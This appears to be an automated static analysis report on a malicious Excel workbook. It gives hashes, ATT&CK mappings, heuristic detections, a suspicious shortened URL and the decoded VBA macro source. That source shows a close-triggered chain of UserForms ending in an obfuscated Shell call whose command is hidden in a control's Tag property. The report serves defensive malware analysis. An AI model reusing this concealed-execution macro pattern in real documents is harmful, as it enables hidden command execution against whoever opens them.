Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 6865ef6597edb3cd…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 50.6 KB
Created: 2012-04-22 18:55:29 UTC
Authoring application: Microsoft Excel 12.0000
First seen: 2021-05-22
MD5: 5628c045459159df6ffd24ff672d5f0e
SHA-1: 7262d4add81921afcd48e78512a527b37f4bc497
SHA-256: 6865ef6597edb3cd0fed6c3ad55bedfb34916b3c8d86a139debdcdcdd9d7f005
Risk score: 130

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1203 Exploitation for Client Execution

The sample is an OOXML (Excel) workbook containing VBA macros. The `Workbook_BeforeClose` event handler in `ThisWorkbook` displays `UserForm1`; the `UserForm_Terminate` handler of `UserForm1` unloads itself and shows `UserForm2`, whose own `UserForm_Terminate` handler calls `Shell` (written as `shell#` and split across line continuations) with a command string read from the `Tag` property of a `CloseTheWindow` member of `UserForm2`, so the command itself does not appear in the macro source. This indicates the macro is designed to download and execute a second-stage payload. The presence of two hidden sheets further supports the malicious intent.

Heuristics (5)

  • VBA project inside OOXML (medium, 2 related findings) OOXML_VBA
    Document contains a VBA project (VBA macros present)
  • Potential Shell call in VBA (critical) OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script:
    Private Sub UserForm_Terminate()
    shell# _
    UserForm2 _
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Hidden worksheet (low) OOXML_HIDDEN_SHEET
    Excel workbook contains 2 hidden sheet(s); hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.google.com (in document text: OOXML body / shared strings)
    • http://www.j.mp/djasidjaisjdiasjid (in document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2187 bytes
SHA-256: 8ca7cad4331f3ad8da58693f2716c1528bdf0bfba05827332df3e7d5b064ece7
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{4E5956A1-C5C0-4131-B696-3BCA379355DF}{60375DD8-631F-46B8-A961-7E341B693F5E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Terminate()
shell# _
UserForm2 _
.CloseTheWindow _
.Tag
End Sub


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private _
Sub _
Workbook_BeforeClose(Cancel As Boolean)
UserForm1 _
.Show
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{F829481F-315A-4874-B3E2-5D96836FF130}{824DF52D-8792-4FB5-A729-F403C45EF985}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Option Explicit


Private Sub UserForm_Terminate()
Unload Me 'UserForm1
UserForm2 _
.Show
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 19968 bytes
SHA-256: 5436af8301e1dd5057e5e46e34982e424c5140c52ef166f4cdd2fe02ba857e37